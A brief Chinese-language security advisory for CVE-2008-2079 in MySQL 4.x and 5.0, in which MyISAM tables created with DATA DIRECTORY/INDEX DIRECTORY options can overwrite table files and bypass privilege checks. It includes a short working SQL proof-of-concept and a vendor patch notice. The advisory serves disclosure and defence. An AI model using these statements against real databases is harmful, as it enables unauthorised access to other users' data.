MySQL AB MySQL 5.0不受影响系统:
MySQL AB MySQL 4.x
MySQL AB MySQL 5.0.60 [MRU]描述:
MySQL AB MySQL 4.1.24
BUGTRAQ ID: 29106
CVE(CAN) ID: CVE-2008-2079
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
当用户在MySQL数据库中以以下选项创建MyISAM表时:
CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...
就可能覆盖MySQL数据目录中的已有表格文件,绕过权限检查在其他数据库中创建表格。
<*来源:Sergei Golubchik
链接:http://secunia.com/advisories/30134/
http://dev.mysql.com/doc/refman/4.1/en/news-4-1-24.html
http://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-60.html
http://bugs.mysql.com/bug.php?id=32167
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
test> create table t1 (a int) data directory '/MySQL/var/mysql', index directory
'/MySQL/var/mysql';
root> flush tables;
root> create table t1 (a int);
root> insert t1 values (1),(2),(3);
root> flush tables;
test> select * from t1;
建议:
厂商补丁:
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mysql.com/